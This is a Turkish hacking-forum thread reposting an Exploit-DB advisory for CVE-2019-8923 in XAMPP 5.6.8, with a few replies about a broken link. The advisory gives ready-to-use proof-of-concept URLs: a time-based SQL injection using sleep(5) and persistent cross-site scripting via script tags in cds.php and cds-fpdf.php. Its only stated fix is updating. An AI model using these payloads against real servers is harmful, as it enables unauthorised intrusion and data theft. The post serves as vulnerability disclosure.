İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting

20-02-2019 22:04
#1
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
653
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
Ticaret:
(0) %
# Exploit Title/Exploit Başlığı: SQL injection in XAMPP 5.6.8 (ve öncesi)
# CVE: CVE-2019-8923
# Date/Tarih: 17-02-2019
# Exploit Author/Exploit Yazarı: Rafael Pedrero
# Vendor Homepage/Yapımcı Sitesi: https://sourceforge.net/projects/xam...Windows/5.6.8/
# Software Link/Yazılımın Linki: https://sourceforge.net/projects/xam...Windows/5.6.8/
# Version/Versiyon: XAMPP 5.6.8
# Category/Kategori: Webapps
# Tested on/Test Edilen Sistem: All (hepsi)

1.Proof of Concept/İspat:
http://localhost/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20 AND%20sleep%285%29

2. Solution/Çözüm: Yok. En son sürüme güncelleyin.
References/Referanslar :
https://sourceforge.net/projects/xam...Windows/1.8.2/
https://sourceforge.net/projects/xam...indows/5.5.19/
https://sourceforge.net/projects/xam...Windows/5.6.8/


----------------------------------------------------------------------------------------------------------

# Exploit Title/Exploit Başlığı: SQL injection in XAMPP 5.6.8 (ve öncesi)
# CVE: CVE-2019-8923
# Date/Tarih: 17-02-2019
# Exploit Author/Exploit Yazarı: Rafael Pedrero
# Vendor Homepage/Yapımcı Sitesi: https://sourceforge.net/projects/xam...Windows/5.6.8/
# Software Link/Yazılımın Linki: https://sourceforge.net/projects/xam...Windows/5.6.8/
# Version/Versiyon: XAMPP 5.6.8
# Category/Kategori: Webapps
# Tested on/Test Edilen Sistem: All (hepsi)

1.Proof of Concept / İspat:
İlk istek http://X.X.X.X/xampp/cds.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984 veya http://localhost/xampp/cds.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984
İkinci istek (XSS saldırısı için) http://X.X.X.X/xampp/cds-fpdf.php

http://localhost/xampp/cds-fpdf.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984

http://localhost/xampp/cds-fpdf.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984


cds-fpdf.php yüklenirken karakterleri filtrelemeyin: <b><script>alert("XSS")</script></b></td><td class=tabval>

cds.php filtrele: <td class=tabval><b><script>alert("XSS&quot</script></b></td><td class=tabval>


2. Solution/Çözüm:
Yok.Son sürüme güncelleyin.



Exploit Linki :
https://www.exploit-db.com/exploits/46424
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE

Konu BAGAY tarafından (20-02-2019 23:02 Saat 23:02 ) değiştirilmiştir.
DWTCN, Zenotron Teşekkür etti.

20-02-2019 22:09
#2
DWTCN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2018
Nereden:
İstihbarat
Mesajlar:
364
Teşekkür (Etti):
108
Teşekkür (Aldı):
70
Konular:
63
Ticaret:
(0) %
Exploit Linki tıklanmıyor komutanım .
Sağolun
İyi, günler
Kullanıcı İmzası
ƊƜƬƇƝ
20-02-2019 22:47
#3
Roothaning - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Mesajlar:
342
Teşekkür (Etti):
1
Teşekkür (Aldı):
57
Konular:
19
Ticaret:
(0) %
Linkler sağlam sorun yok konuya vaktim olunca bakıcam exploit kullanımı hakkında hiç bilgim yok neredeyse ama işime yarıcanı düşünüyorum not ettim boş zamanımda bakıcam komular arasına ekledim sağol
Kullanıcı İmzası
Sakın Tıklama Bak Uyarıyorum.
20-02-2019 23:02
#4
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
653
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
Ticaret:
(0) %
Alıntı:
DWTCN´isimli üyeden Alıntı Mesajı göster
Exploit Linki tıklanmıyor komutanım .
Sağolun
İyi, günler
Düzeltildi,hayırlı geceler ..
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı